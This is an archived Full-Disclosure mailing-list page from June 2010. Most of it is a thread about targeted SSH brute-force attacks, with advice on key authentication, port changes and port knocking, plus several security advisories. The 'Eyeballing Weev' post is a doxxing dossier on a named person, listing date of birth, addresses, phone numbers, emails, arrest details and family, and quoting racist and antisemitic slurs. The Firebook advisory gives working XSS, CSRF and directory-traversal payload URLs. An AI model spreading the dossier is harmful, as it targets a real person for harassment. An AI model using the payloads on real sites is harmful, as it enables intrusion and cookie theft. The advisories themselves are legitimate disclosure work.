Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] targetted SSH bruteforce attacks

2010-06-17 Thread Valdis . Kletnieks 
On Thu, 17 Jun 2010 16:04:25 BST, Benji said:
> Anyone. else. seeing. a. targetted. attack.
> 
> Why would anyone else see a TARGETTED attack?

I think the original poster meant "targeted" as in "we've got a fairly big
address space, and exactly one host is being poked, rather than every single
one like most scan-and-attack".



pgp7nIl62B4h1.pgp
Description: PGP signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] targetted SSH bruteforce attacks

2010-06-17 Thread Gary Baribault 
What the question was asking was 'is anyone else' having one machine
attacked in particular as opposed to all of their machines.

What I explained in the original post was that in all past instances
(many times a day, every day) when one machine is attacked, the other
is as well, since they are close to each other on a major cable modem
ISP. In this case only one of the machines is being attacked, and it's
a relatively stealthy attack.

So the question is if anyone else is seeing the same type of activity.

Gary Baribault
Courriel: g...@baribault.net
GPG Key: 0x685430d1
Signature: 9E4D 1B7C CB9F 9239 11D9 71C3 6C35 C6B7 6854 30D1


On 06/17/2010 11:04 AM, Benji wrote:
> What?
>
> Think about what you said.
>
> Anyone. else. seeing. a. targetted. attack.
>
> Why would anyone else see a TARGETTED attack?
>
> anyway, no, you're not special, distributed SSH bruteforce is normal.
>
>
> On Thu, Jun 17, 2010 at 1:44 PM, Gary Baribault  wrote:
>> I just knew that people would say that, and that's why I specified
>> that I WANT to keep SSH on 22 .. it's fun to see the attacks, and it's
>> interesting to see new types of attacks. The question here is whether
>> anyone else is seeing such a targeted attack.
>>
>> Gary Baribault
>> Courriel: g...@baribault.net
>> GPG Key: 0x685430d1
>> Signature: 9E4D 1B7C CB9F 9239 11D9 71C3 6C35 C6B7 6854 30D1
>>
>>
>> On 06/17/2010 08:28 AM, d...@mrhinkydink.com wrote:
>>>
>>> Have you ever considered obfuscated-openssh?
>>>
>>> http://github.com/brl/obfuscated-openssh
>>>
>>> I have a modified version of PuTTY available for it...
>>>
>>> http://www.mrhinkydink.com/potty.htm
>>>
>>> Still... you should change the freakin' port.
>>>
>>>  Original Message  Subject: [Full-disclosure]
>>> targetted SSH bruteforce attacks From: Gary Baribault
>>>  Date: Thu, June 17, 2010 7:48 am To:
>>> full-disclosure@lists.grok.org.uk
>>>
>>> Hello list,
>>>
>>> I have a strange situation and would like information from the list
>>> members. I have three Linux boxes exposed to the Internet. Two of
>>> them are on cable modems, and both have two services that are
>>> publicly available. In both cases, I have SSH and named running and
>>> available to the public. Before you folks say it, yes I run SSH on
>>> TCP/22 and no I don't want to move it to another port, and no I
>>> don't want to restrict it to certain source IPs.
>>>
>>> Both of these systems are within one /21 and get attacked
>>> regularly. I run Denyhosts on them, and update the central server
>>> once an hour with attacking IPs, and obviously also download the
>>> public hosts.deny list.
>>>
>>> These machines get hit regularly, so often that I don't really
>>> care, it's fun to make the script kiddies waste their time! But in
>>> this instance, only my home box is being attacked... someone is
>>> burning a lot of cycles and hosts to do a distributed dictionary
>>> attack on my one box! The named daemon is non recursive, properly
>>> configured, up to date and not being attacked.
>>>
>>> Is anyone else seeing this type of attack? Or is someone really
>>> targeting MY box?
>>>
>>> Thanks
>>>
>>>
>>> Gary Baribault Courriel: g...@baribault.net GPG Key: 0x685430d1
>>> Signature: 9E4D 1B7C CB9F 9239 11D9 71C3 6C35 C6B7 6854 30D1
>>>
>>> ___ Full-Disclosure -
>>> We believe in it. Charter:
>>> http://lists.grok.org.uk/full-disclosure-charter.html Hosted and
>>> sponsored by Secunia - http://secunia.com/
>>>
>>> ___ Full-Disclosure -
>>> We believe in it. Charter:
>>> http://lists.grok.org.uk/full-disclosure-charter.html Hosted and
>>> sponsored by Secunia - http://secunia.com/
>>>
>>
>>
>> ___
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] targetted SSH bruteforce attacks

2010-06-17 Thread Gary Baribault 
Thanks Valdis, that's exactly it.

Gary Baribault
Courriel: g...@baribault.net
GPG Key: 0x685430d1
Signature: 9E4D 1B7C CB9F 9239 11D9 71C3 6C35 C6B7 6854 30D1


On 06/17/2010 11:38 AM, valdis.kletni...@vt.edu wrote:
> On Thu, 17 Jun 2010 16:04:25 BST, Benji said:
>   
>> Anyone. else. seeing. a. targetted. attack.
>>
>> Why would anyone else see a TARGETTED attack?
>> 
> I think the original poster meant "targeted" as in "we've got a fairly big
> address space, and exactly one host is being poked, rather than every single
> one like most scan-and-attack".
>
>   

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] targetted SSH bruteforce attacks

2010-06-17 Thread Randal L. Schwartz 
> "Emmanuel" == Emmanuel VERCHERE  writes:

Emmanuel> SSH daemons using password auth exposed to the Internet _do_
Emmanuel> get bruteforce attempts. I would not recommend moving it to a
Emmanuel> different port than 22 as that would be of very, _very_ little
Emmanuel> help - rather switch to public key auth (plus SPA if you're
Emmanuel> paranoid), et voila.

After being regularly nailed on my port 22, I *did* move it.  I've had
only *one* attack since then, down by a factor of 20 or so.

Yes, it's worth it to not be on port 22, as long as you're one of the
few. :)  Remember, these bots are going for low-hanging fruit... it's
not worth it for them to hit all 65k ports.

Now, if we *all* move away from 22, your advice is more appropriate.

-- 
Randal L. Schwartz - Stonehenge Consulting Services, Inc. - +1 503 777 0095
 http://www.stonehenge.com/merlyn/>
Smalltalk/Perl/Unix consulting, Technical writing, Comedy, etc. etc.
See http://methodsandmessages.vox.com/ for Smalltalk and Seaside discussion

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Update for PS

2010-06-17 Thread mezgani ali 
I got a tweet today about a Nice and real message in the last update IANA"
for .PS",
http://www.iana.org/domains/root/db/ps.html

Hope that this information will merge quickly and update all *Brainstorming
routines.

*Best regards,
-- 
Ali MEZGANI
Network Engineering/Security
http://securfox.wordpress.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] targetted SSH bruteforce attacks

2010-06-17 Thread dink 

Point taken.  However, my ulterior motive was in promoting
obfuscated-openssh, which, IMHO, is an excellent and under-appreciated
enhancement to openssh.

Note that with iptables you can leave ssh on port 22 but have it answer
on other ports.  See http://proxyobsession.net/?p=869

Why anyone would want to do that is beyond me.

 Original Message 
Subject: Re: [Full-disclosure] targetted SSH bruteforce attacks
From: Gary Baribault 
Date: Thu, June 17, 2010 8:44 am
To: full-disclosure@lists.grok.org.uk

 I just knew that people would say that, and that's why I specified
 that I WANT to keep SSH on 22 .. it's fun to see the attacks, and it's
 interesting to see new types of attacks. The question here is whether
 anyone else is seeing such a targeted attack.
 
 Gary Baribault
 Courriel: g...@baribault.net
 GPG Key: 0x685430d1
 Signature: 9E4D 1B7C CB9F 9239 11D9 71C3 6C35 C6B7 6854 30D1
 
 
 

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] TEHTRI-Security released 13 0days against web tools used by evil attackers

2010-06-17 Thread Laurent OUDOT at TEHTRI-Security 

Gents,

As announced in recent emails here, we have just released 13 0days and
new offensive concepts against most of the tools currently used by web
attackers, like web shells, exploit packs, etc, during our new talk at
SyScan Singapore 2010 : http://www.syscan.org/Sg/speakers.html#012

We have given new methods to counter-strike intruders with our new
exploits giving you remote shells, remote SQL injection, permanent XSS
and dangerous XSRF, against remote tools used by attackers.

It's time to have strike-back capabilities for real, and to have
alternative and innovative solutions against those security issues.

We have shown how to know, identify, exploit, neutralize or destroy
attackers using those kind of tools.

For example, we gave (some of) our 0days against known tools like Sniper
Backdoor, Eleonore Exploit Pack, Liberty Exploit Pack, Lucky Exploit
Pack, Neon Exploit Pack, Yes Exploit Pack...

This was a way to explain that you can react when you are under attack.

We hope that this will open a new way to think about IT Security
worldwide, and that it might help people sometimes.

Do not hesitate to contact TEHTRI-Security if you need technical
assistance (pentests, incident handling, source code analysis, etc) with
experts who know how work cyber conflicts for real, which is totally
different from people who have clean certifications or who just
masterize security research in labs...

Here is the list of the 13 security advisories and 0days that we just
released today.

TEHTRI-SA-2010-023 - Vuln in NEON Exploit Pack. Permanent XSS+XSRF.
TEHTRI-SA-2010-022 - Vuln in NEON Exploit Pack. SQL Injection.
TEHTRI-SA-2010-021 - Vuln in YES Exploit Pack. Remote File Disclosure.
TEHTRI-SA-2010-020 - Vuln in YES Exploit Pack. Permanent XSS+XSRF admin.
TEHTRI-SA-2010-019 - Vuln in YES Exploit Pack. Remote SQL Injection.
TEHTRI-SA-2010-018 - Vuln in LuckySploit Expl Pack. Remote control.
TEHTRI-SA-2010-017 - Vuln in Liberty Exploit Pack. Permanent XSS+XSRF.
TEHTRI-SA-2010-016 - Vuln in Liberty Exploit Pack. SQL Injection.
TEHTRI-SA-2010-015 - Vuln in Eleonore Exploit Pack. Another SQL Inject.
TEHTRI-SA-2010-014 - Vuln in Eleonore Exploit Pack. XSRF in admin panel.
TEHTRI-SA-2010-013 - Vuln in Eleonore Exploit Pack. Permanent XSS.
TEHTRI-SA-2010-012 - Vuln in Eleonore Exploit Pack. Remote SQL Inject.
TEHTRI-SA-2010-011 - Vuln in Sniper_SA Web Backdoor. Remote File Disclos

More explanations available on our web site:
http://www.tehtri-security.com/en/news.php

Do not hesitate to contact us directly if needed.

Best regards,
Take care.

Laurent OUDOT - "TEHTRI-Security, This is not a game."
 CEO & Founder of TEHTRI-Security
 http://www.tehtri-security.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] targetted SSH bruteforce attacks

2010-06-17 Thread Michael Holstein 

> Note that with iptables you can leave ssh on port 22 but have it answer
> on other ports.  See http://proxyobsession.net/?p=869
>   

Or just change the entry in ./etc/sshd_config

# What ports, IPs and protocols we listen for
Port 22

>From man(5)sshd_config :

Port:Specifies the port number that sshd(8) listens on.  The default
is 22.  Multiple options of this type are permitted.  See also
ListenAddress.

Cheers,

Michael Holstein
Cleveland State University


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] targetted SSH bruteforce attacks

2010-06-17 Thread dink 

Um, yeah... that's exactly what I recommend in the article, which I'm
sure you read. ;o)

The original suggestion was "If you want SSH on a different port, do
this with firewall rules".

Way too much work, IMO.

 Original Message 
Subject: Re: [Full-disclosure] targetted SSH bruteforce attacks
From: Michael Holstein 
Date: Thu, June 17, 2010 1:35 pm
To: d...@mrhinkydink.com
Cc: full-disclosure@lists.grok.org.uk


> Note that with iptables you can leave ssh on port 22 but have it answer
> on other ports. See http://proxyobsession.net/?p=869
> 

Or just change the entry in ./etc/sshd_config

# What ports, IPs and protocols we listen for
Port 22

>From man(5)sshd_config :

Port: Specifies the port number that sshd(8) listens on. The default
is 22. Multiple options of this type are permitted. See also
ListenAddress.

Cheers,

Michael Holstein
Cleveland State University

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] targetted SSH bruteforce attacks

2010-06-17 Thread Xin LI 
On FreeBSD you can probably just use the following pf.conf line to
block most of such attacks:

block in quick proto tcp from any os "Linux" to any port ssh

(Note that with this you may lose the ability to login from any Linux
based box including from an Android phone, etc)

Of course it's wise to disable password authentication and just use
public key authentication.

Cheers,

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] targetted SSH bruteforce attacks

2010-06-17 Thread Paul Schmehl 
--On Thursday, June 17, 2010 09:38:02 -0700 "Randal L. Schwartz" 
 wrote:

>> "Emmanuel" == Emmanuel VERCHERE  writes:
>
> Emmanuel> SSH daemons using password auth exposed to the Internet _do_
> Emmanuel> get bruteforce attempts. I would not recommend moving it to a
> Emmanuel> different port than 22 as that would be of very, _very_ little
> Emmanuel> help - rather switch to public key auth (plus SPA if you're
> Emmanuel> paranoid), et voila.
>
> After being regularly nailed on my port 22, I *did* move it.  I've had
> only *one* attack since then, down by a factor of 20 or so.
>
> Yes, it's worth it to not be on port 22, as long as you're one of the
> few. :)  Remember, these bots are going for low-hanging fruit... it's
> not worth it for them to hit all 65k ports.
>
> Now, if we *all* move away from 22, your advice is more appropriate.

Of course if you do account provisioning correctly and configure your hosts 
securely, you're not exposed on port 22 either.  You just have to deal with the 
constant knocking at the door.  Some of us have simply learned to ignore it. 
It's just the background noise of the internet.

-- 
Paul Schmehl, Senior Infosec Analyst
As if it wasn't already obvious, my opinions
are my own and not those of my employer.
***
"It is as useless to argue with those who have
renounced the use of reason as to administer
medication to the dead." Thomas Jefferson

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] targetted SSH bruteforce attacks

2010-06-17 Thread Paul Schmehl 
--On Thursday, June 17, 2010 11:04:52 -0700 Xin LI  wrote:

> On FreeBSD you can probably just use the following pf.conf line to
> block most of such attacks:
>
> block in quick proto tcp from any os "Linux" to any port ssh
>
> (Note that with this you may lose the ability to login from any Linux
> based box including from an Android phone, etc)
>
> Of course it's wise to disable password authentication and just use
> public key authentication.

Why?  Ssh is encrypted, so you're not exposing a password when you login.  How 
does public key authentication make you more secure (in a practical sense)?

-- 
Paul Schmehl, Senior Infosec Analyst
As if it wasn't already obvious, my opinions
are my own and not those of my employer.
***
"It is as useless to argue with those who have
renounced the use of reason as to administer
medication to the dead." Thomas Jefferson

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] targetted SSH bruteforce attacks

2010-06-17 Thread John Jacobs 


> > Of course it's wise to disable password authentication and just use
> > public key authentication.
> 
> Why?  Ssh is encrypted, so you're not exposing a password when you login.  
> How 
> does public key authentication make you more secure (in a practical sense)?
> 

Paul, it's more secure in that brute force attacks are mitigated because the 
private key is required by the client and the public key must appear in 
~/.ssh/authorized_keys.  Disabling password authentication means a weak 
password on an account cannot be compromised by brute force or other discovery 
efforts.  A password on the private key provides even greater defense-in-depth 
security.

Disable password authentication and enforce key-pair authentication and 
targeted brute-force attacking becomes moot very quickly.  Moving SSHd from TCP 
22 also keeps the script-kiddies and automated scanners away.

After doing these two basic things then it's time to focus on fail2ban, 
denyhosts, and the other firewall integrating solutions.


  ___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] targetted SSH bruteforce attacks

2010-06-17 Thread Mr. MailingLists 
Hello Gary/List!

On 6/17/2010 6:48 AM, Gary Baribault wrote:
> Hello list,
> 
> I have a strange situation and would like information from the
> list members. I have three Linux boxes exposed to the Internet. Two of
> them are on cable modems, and both have two services that are publicly
> available. In both cases, I have SSH and named running and available
> to the public. Before you folks say it, yes I run SSH on TCP/22 and no
> I don't want to move it to another port, and no I don't want to
> restrict it to certain source IPs.

Since almost every angle of securing SSHD publicly have already been listed I 
will not
delve into that, so take my advice with a grain of salt.

In my environment, in order to access any of what I call trusted resources 
(such as ssh) I
require myself to have VPN connectivity. This eliminates the need of having 
SSHD listen
publicly, and as expected, eliminated all unknown hosts accessing my box via 
SSHD. It also
made my auth log much shorter and manageable as well :), but it is also more 
boring.

I'm guessing this wont work for your situation (seeing that you don't want to 
change the
public port either).

Otherwise, as said before:
Changing the port will absolutely reduce the number of hits, and concurrent 
attack attempts.

Use of port-knocking techniques will also achieve the above, and the use of PKA 
will
almost (almost, nothing is certain, hehe Debian) eliminate the chance of the 
opposition
recreating your private key.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] targetted SSH bruteforce attacks

2010-06-17 Thread Mark Byrne 
It's impossible for anyone on this mailing list to know if the attack is
personal or not, unless they are actually involved in the attack. Use a
password such as 7%Ônç#®]�...@ãnÝèÅ#çñ] and watch them hack away to their
heart's content.

On 17/06/2010 13:48, Gary Baribault wrote:
> Hello list,
> 
> I have a strange situation and would like information from the
> list members. I have three Linux boxes exposed to the Internet. Two of
> them are on cable modems, and both have two services that are publicly
> available. In both cases, I have SSH and named running and available
> to the public. Before you folks say it, yes I run SSH on TCP/22 and no
> I don't want to move it to another port, and no I don't want to
> restrict it to certain source IPs.
> 
> Both of these systems are within one /21 and get attacked
> regularly. I run Denyhosts on them, and update the central server once
> an hour with attacking IPs, and obviously also download the public
> hosts.deny list.
> 
> These machines get hit regularly, so often that I don't really
> care, it's fun to make the script kiddies waste their time! But in
> this instance, only my home box is being attacked... someone is
> burning a lot of cycles and hosts to do a distributed dictionary
> attack on my one box! The named daemon is non recursive, properly
> configured, up to date and not being attacked.
> 
> Is anyone else seeing this type of attack? Or is someone really
> targeting MY box?
> 
> Thanks
> 
> 
> Gary Baribault
> Courriel: g...@baribault.net
> GPG Key: 0x685430d1
> Signature: 9E4D 1B7C CB9F 9239 11D9 71C3 6C35 C6B7 6854 30D1
> 
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
> 

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] targetted SSH bruteforce attacks

2010-06-17 Thread iRAQi BlackHat 
Answering the question of the topic: Yes.

If you plug-in a completely a new box to the internet, and watch the logs
you shall see there is an attack going on. The net is full of automated BOTS
running and they just keep hitting you (randomly or something).

BTW, a good solution to these problems is a Port-Knocking system, which
makes your service completely unexposed. See Tariq or any other PK system:
http://code.google.com/p/tariq/
http://www.portknocking.org/view/implementations


Regards,
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Eyeballing Weev (Updated)

2010-06-17 Thread Eyeballing Weev 
 Eyeballing Andrew Alan Escher Auernheimer
Delusional - IRC warrior - crack smoker - drug addict - bullshitter - jail
bitch - dwarf - hypocrite - idiot


  Proverbs 13:3 "Whoever controls his mouth protects his own life. Whoever
has a big mouth comes to ruin."


Contents:

1. Personal Info
2. Family
3. WHOIS info
4. Emails


Introduction:

Andrew, better known as weev, is a delusional young man who think he is
greater than he actually is. He hibernates on IRC,
babbles when smoked up on moon rocks, makes insane claims without any
evidence nor anyone calling him out about it, and
encourages others to join in his self-destructive behavior. His family hates
him and have not had contact with him for
over 2 years. Pictures of Andrew, which are widely available, show his
decline from his NY Times days (clean shaved),
to some of his pictures with long hair, and all the way up to his drug
arrest on 06/15/2010 where he looks like some flavor
of street bum begging you for the change you hear in your pocket but you
tell the bum it's your car keys just so you can
make a quick getaway.

Andrew, you should spend time in jail, which will detox your body of moon
rocks and your other drugs of preference. I'm
sure after a year or two of detox, avoiding prison rape, and begging for
protection from skinhead prison gangs - you'll
realize that your delusional life on IRC is not worth it so you will come
out of jail and live a normal, productive,
drug-free life.



--Personal Info

Full name: Andrew Alan Escher Auernheimer aka "weev"

According to LinkedIn, Weev is "White", Native-American, and "other"

Aliases: Joseph Evers
 Andrew Wbeelsoi
 Escher Auernheimer

DOB: 09/01/1985 (Confirmed by arrest and "Vinelink" notification service for
when he is released)
Eyes: Brown
Hair: Brown
Height: 5'4"
Weight: 150lbs

(Source: 06/15/2010 drug arrest)

Education: James Madison University
"Auernheimer, Andrew A. attended JMU from the fall of 1998 to the spring of
2000 studying Anthropology" -Registrar Office of JMU


Last known addresses: 505 N SHADY AVE. FAYETTEVILLE, AR 72701 (Source:
06/15/2010 arrest)
*Note: Address belongs to - McElveen & Rush Plc. 505 N Shady Ave.
Fayetteville, AR 72701. 479-973-2900

Phone numbers: 323-879-8007 (Source: SealPAC WHOIS)
   479-363-1488 (Source: LinkedIn)

Email addresses: glutt...@gmail.com and weev...@yahoo.com

Criminal Record:
06/15/2010 - Washington County, Arkansas. Booked for possession of LSD,
cocaine, MDMA (ecstasy), and various controlled pills by Fayetteville PD.
??/??/2010 - Giving a false name to authorities.


URLs:
http://www.facebook.com/people/Joseph-Evers/1208740546#!/profile.php?id=1208740546
http://www.okcupid.com/profile/weev/pictures
http://www.linkedin.com/in/josephevers (known alias)
http://www.encyclopediadramatica.com/index.php/weev
http://weev.livejournal.com

Online Aliases:

- Weev
- Wbeelsoi
- Uchiha Weevlos
- Weevlar
- Andrew wbeelsoi
- Andrew weevlos
- The iProhet
- TheiProphet
- The-iProphet

Media sightings:

-iPad/AT&T Drama
Initial iPad/AT&T story: http://news.cnet.com/8301-27080_3-20007309-245.html
AT&T criticism of weev: http://news.cnet.com/8301-1009_3-20007564-83.html
Weev's response: http://news.cnet.com/8301-27080_3-20007407-245.html
Arrest for drug possession:
http://news.cnet.com/8301-27080_3-20007827-245.html
Confirmed FBI involvement in search:
http://online.wsj.com/article/SB10001424052748704198004575310634055906968.html?mod=WSJ_Tech_LEADTop

Toorcon2111, Cybercrime:
http://video.google.com/videoplay?docid=-5643217366887354926&ei=iOzHSvzBOpbWrQKvlu2KDg&q=andrew+wbeelsoi

http://www.jewishreview.org/local/Police-question-two-men-about-threats-to-Jewish-community
*Note: Weev was raged about being named. Source:
http://www.webcitation.org/5jnP71qsD

NYTimes "Mawebulence" Expose:
http://www.nytimes.com/2008/08/03/magazine/03trolls-t.html?_r=1&hp&oref=slogin
*Note: NYTimes article is typical of Andrew's ranting- making claims with no
proof to back it up.

Hilarious Logs:

09:50  i gotta get some money
09:50  my cashflow sucks
09:51  whores
09:51  lavish cars
09:51  gigantic places to live

15:05  does anybody know these russians
15:06  that they are buying up hacked macs for 43 cents an install
15:26  i have access to like
15:26  8k rooted macs
15:26  right now
15:26  and i would like to make a quick $3500

22:02  im all for white people cleaning up the nigger problem
22:03  i hate niggers
22:03  i hate niggers.

(Note: Chelsea and Anthony Auernheimer, his siblings, are African-American)

02:23  i read what the kikes did to you
02:23  i raged :(
02:24  lol
02:24  i dont mind
02:24  theyre doin me a favor

"seriously. we need a sysop faq that is sure to state that the only
person we are allowed to mention when talking about ED ownership is
joseph evers." -- weev, 20080531, correspondence

"yes please scrub realnames from ED" -- weev, 20080531, correspondence



--Family:


Latest home address:
2038 W Grace

[Full-disclosure] [SECURITY] [DSA 2063-1] New pmount packages fix denial of service

2010-06-17 Thread Giuseppe Iuculano 
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- 
Debian Security Advisory DSA-2063-1  secur...@debian.org
http://www.debian.org/security/Giuseppe Iuculano
June 17, 2010 http://www.debian.org/security/faq
- 

Package: pmount
Vulnerability  : insecure temporary file
Problem type   : local
Debian-specific: no
CVE Id : CVE-2010-2192


Dan Rosenberg discovered that pmount, a wrapper around the standard mount
program which permits normal users to mount removable devices without a
matching /etc/fstab entry, creates files in /var/lock insecurely.
A local attacker could overwrite arbitrary files utilising a symlink attack.


For the stable distribution (lenny), this problem has been fixed in
version 0.9.18-2+lenny1

For the unstable distribution (sid), this problem has been fixed in
version 0.9.23-1, and will migrate to the testing distribution (squeeze)
shortly.

We recommend that you upgrade your pmount package.

Upgrade instructions
- 

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 5.0 alias lenny
- 

Debian (stable)
- ---

Stable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, 
mips, mipsel, powerpc, s390 and sparc.

Source archives:

  
http://security.debian.org/pool/updates/main/p/pmount/pmount_0.9.18.orig.tar.gz
Size/MD5 checksum:   436009 d04973bde34edac7dd2e50bfe8f10700
  
http://security.debian.org/pool/updates/main/p/pmount/pmount_0.9.18-2+lenny1.dsc
Size/MD5 checksum: 1202 d2a121965c3af232694c8df63821d713
  
http://security.debian.org/pool/updates/main/p/pmount/pmount_0.9.18-2+lenny1.diff.gz
Size/MD5 checksum: 8778 96ad2faddf78f80b104a4b9d883507d5

alpha architecture (DEC Alpha)

  
http://security.debian.org/pool/updates/main/p/pmount/pmount_0.9.18-2+lenny1_alpha.deb
Size/MD5 checksum:   119610 b8734d5a360b76e0c8dc7e7d97ee2f9d

amd64 architecture (AMD x86_64 (AMD64))

  
http://security.debian.org/pool/updates/main/p/pmount/pmount_0.9.18-2+lenny1_amd64.deb
Size/MD5 checksum:   117680 5ef3870410e876fbc7bdd0e092f08eef

arm architecture (ARM)

  
http://security.debian.org/pool/updates/main/p/pmount/pmount_0.9.18-2+lenny1_arm.deb
Size/MD5 checksum:   100718 b04cb703b30df4605d9d121ee2c89c16

armel architecture (ARM EABI)

  
http://security.debian.org/pool/updates/main/p/pmount/pmount_0.9.18-2+lenny1_armel.deb
Size/MD5 checksum:   101628 1ecb1c7cc49eda6d31de2165327dac99

hppa architecture (HP PA RISC)

  
http://security.debian.org/pool/updates/main/p/pmount/pmount_0.9.18-2+lenny1_hppa.deb
Size/MD5 checksum:   113350 189516bd992b63efaa489067cc9f6449

i386 architecture (Intel ia32)

  
http://security.debian.org/pool/updates/main/p/pmount/pmount_0.9.18-2+lenny1_i386.deb
Size/MD5 checksum:   102034 5070f1a0a8a9d617c710bc2820bf65e9

ia64 architecture (Intel ia64)

  
http://security.debian.org/pool/updates/main/p/pmount/pmount_0.9.18-2+lenny1_ia64.deb
Size/MD5 checksum:   133204 747d5be1ca278b8bac08522d72282923

mips architecture (MIPS (Big Endian))

  
http://security.debian.org/pool/updates/main/p/pmount/pmount_0.9.18-2+lenny1_mips.deb
Size/MD5 checksum:   114712 661bf288a4790a6c99f826a9d23ed584

mipsel architecture (MIPS (Little Endian))

  
http://security.debian.org/pool/updates/main/p/pmount/pmount_0.9.18-2+lenny1_mipsel.deb
Size/MD5 checksum:   115204 e5fc95107322fa23317ac413b9d0dac5

powerpc architecture (PowerPC)

  
http://security.debian.org/pool/updates/main/p/pmount/pmount_0.9.18-2+lenny1_powerpc.deb
Size/MD5 checksum:   124538 684de19e8f8df5ae941849b1b0298e33

s390 architecture (IBM S/390)

  
http://security.debian.org/pool/updates/main/p/pmount/pmount_0.9.18-2+lenny1_s390.deb
Size/MD5 checksum:   116318 a80c45d4dbd5a7fb666f4926e5deac59

sparc architecture (Sun SPARC/UltraSPARC)

  
http://security.debian.org/pool/updates/main/p/pmount/pmount_0.9.18-2+lenny1_sparc.deb
Size/MD5 checksum:   102488 96c8d0f14087b1036c70bd500da2b032


  These files will probably be moved into the stable distribution on
  its next update.

- 
-
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security 
dists/stable/updates/main
Mailing list: debian-security-annou...@lists.debian.org
Package info: `apt-cache show ' and http://

[Full-disclosure] Vulnerabilities in Firebook

2010-06-17 Thread MustLive 
Hello Full-Disclosure!

I want to warn you about security vulnerabilities in Firebook.

-
Advisory: Vulnerabilities in Firebook
-
URL: http://websecurity.com.ua/4124/
-
Affected products: all versions of Firebook.
-
Timeline:

27.09.2009 - found vulnerabilities.
13.04.2010 - announced at my site.
24.05.2010 - informed developers.
17.06.2010 - disclosed at my site.
-
Details:

These are Information Leakage, Cross-Site Request Forgery, Cross-Site
Scripting, Directory Traversal and Full path disclosure vulnerabilities.

Information Leakage:

http://site/path_to_firebook_admin/?URLproxy=http://firebook.ru/env/index.html;

CSRF:

http://site/path_to_firebook_admin/?URLproxy=http://site;

CSRF-attacks on other sites are possible.

XSS:

http://site/path_to_firebook_admin/?URLproxy=%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://site/guestbook/index.html?answer=%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://site/guestbook/index.html?answer=guestbook/guest/file.html;page=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Directory Traversal:

http://site/path_to_firebook_admin/?param=1;show=../.htaccess;

http://site/guestbook/index.html?answer=guestbook/guest/%2E%2E/index.html

Full path disclosure:

http://site/path_to_firebook_admin/?param=1;show=param.txt;

http://site/guestbook/index.html?answer=guestbook/guest/1

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua 


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] targetted SSH bruteforce attacks

2010-06-17 Thread Sebastian Rother 
On Thu, 17 Jun 2010 16:56:41 -0500
"Mr. MailingLists"  wrote:

> Hello Gary/List!
> 
> On 6/17/2010 6:48 AM, Gary Baribault wrote:
> > Hello list,
> > 
> > I have a strange situation and would like information from the
> > list members. I have three Linux boxes exposed to the Internet. Two of
> > them are on cable modems, and both have two services that are publicly
> > available. In both cases, I have SSH and named running and available
> > to the public. Before you folks say it, yes I run SSH on TCP/22 and no
> > I don't want to move it to another port, and no I don't want to
